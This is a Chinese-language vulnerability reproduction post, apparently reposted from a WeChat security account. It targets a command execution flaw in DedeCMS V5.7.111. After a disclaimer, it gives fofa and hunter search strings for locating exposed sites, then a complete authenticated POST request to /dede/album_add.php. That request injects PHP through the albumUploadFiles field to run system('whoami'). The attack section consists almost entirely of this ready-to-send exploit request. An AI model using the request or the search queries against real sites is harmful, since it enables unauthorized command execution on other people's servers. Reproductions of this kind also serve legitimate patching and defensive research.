【漏洞复现】DedeCMS V5.7.111 命令执行漏洞

admin 2024年4月24日02:42:02评论18 views字数 4450阅读14分50秒阅读模式
  • 0x01 免责声明

请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。

  • 0x02 影响版本

DedeCMS V5.7.111

【漏洞复现】DedeCMS V5.7.111 命令执行漏洞

  • 0x03 网络测绘

fofa:

body="DedeCMS_V57_UTF8_SP2"

hunter:

web.body="DedeCMS_V57_UTF8_SP2"
  • 0x04 漏洞复现

复现条件: 需要登陆

【漏洞复现】DedeCMS V5.7.111 命令执行漏洞

POST /dede/album_add.php HTTP/1.1Host: 127.0.0.1Content-Length: 3922Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySN7cGav43uRQL9eUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://127.0.0.1/dede/album_add.php?channelid=2&cid=0Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: Connection: close------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="channelid"2------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="cid"0------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="imagebody"粘贴到这里...------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="dopost"save------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="maxwidth"800------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="albumUploadFiles"[{"name":"');system('whoami');//","remark":"something"}]------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="title"test------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="shorttitle"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="redirecturl"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="tags"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="weight"93------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="picname"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="litpic"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="typeid"13------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="typeid2"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="dede_addonfields"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="pagestyle"2------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="row"3------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="col"4------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="ddmaxwidth"200------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="pagepicnum"12------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="isrm"1------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="zipfile"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="delzip"1------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="copysource"http://------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="body"<p><br></p>------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="source"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="writer"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="notpost"0------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="click"122------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="sortup"0------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="color"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="arcrank"0------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="ishtml"1------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="pubdate"2023-10-01 13:38:47------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="money"0------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="keywords"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="description"------WebKitFormBoundarySN7cGav43uRQL9eUContent-Disposition: form-data; name="filename"------WebKitFormBoundarySN7cGav43uRQL9eU--

原文始发于微信公众号(Matrix SEC):【漏洞复现】DedeCMS V5.7.111 命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日02:42:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】DedeCMS V5.7.111 命令执行漏洞https://cn-sec.com/archives/2085525.html

发表评论

匿名网友 填写信息